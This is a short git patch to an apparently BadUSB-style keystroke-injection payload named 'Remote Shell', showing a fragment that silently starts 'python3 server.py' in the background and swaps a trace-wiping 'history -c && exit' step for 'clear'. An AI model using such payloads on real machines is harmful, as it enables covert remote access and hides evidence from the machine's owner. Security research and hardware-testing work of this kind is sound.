From 4c7cb6de93db3054f7a35f2dc532e5ab43f26e24 Mon Sep 17 00:00:00 2001 From: Narstybits Date: Mon, 29 May 2023 19:19:21 -0500 Subject: [PATCH] Updated Remote Shell execution script --- Executions/Remote Shell.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Executions/Remote Shell.txt b/Executions/Remote Shell.txt index e7a5e02..c101c9f 100644 --- a/Executions/Remote Shell.txt +++ b/Executions/Remote Shell.txt @@ -45,7 +45,7 @@ DELAY 500 STRING nohup python3 server.py > /dev/null 2>&1 & ENTER DELAY 500 -STRING history -c && exit +STRING clear ENTER